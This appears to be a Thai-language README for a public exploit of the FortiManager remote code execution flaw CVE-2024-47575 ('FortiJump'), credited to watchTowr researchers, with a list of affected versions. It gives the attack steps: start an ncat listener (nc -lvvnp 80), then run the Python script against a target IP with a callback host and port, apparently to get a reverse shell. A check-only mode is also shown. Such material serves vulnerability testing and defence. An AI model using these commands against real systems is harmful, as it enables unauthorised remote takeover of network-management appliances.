Fortijump Exploit CVE 2024 47575
1.0.0
Fortinet FortiManager การเรียกใช้โค้ดระยะไกลที่ไม่ได้รับอนุญาต AKA FortiJump CVE-2024-47575
ดูโพสต์บนบล็อกของเราสำหรับรายละเอียดทางเทคนิค
ในการเริ่มต้น ให้สร้างเซสชัน ncat ของคุณ:
nc -lvvnp 80
จากนั้น รันเครื่องกำเนิดสิ่งประดิษฐ์การตรวจจับของเรา:
python3 CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.53 --lport 80 --action exploit
หากต้องการตรวจสอบช่องโหว่เพียงอย่างเดียว ให้ใช้ตัวเลือกต่อไปนี้:
python3 CVE-2024-47575.py --target 192.168.1.110 --action check
FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4
การใช้ประโยชน์นี้เขียนโดย Sina Kheirkhah (@SinSinology) แห่ง watchTowr (@watchtowrcyber)
สำหรับการวิจัยด้านความปลอดภัยล่าสุด โปรดติดตามทีม watchTowr Labs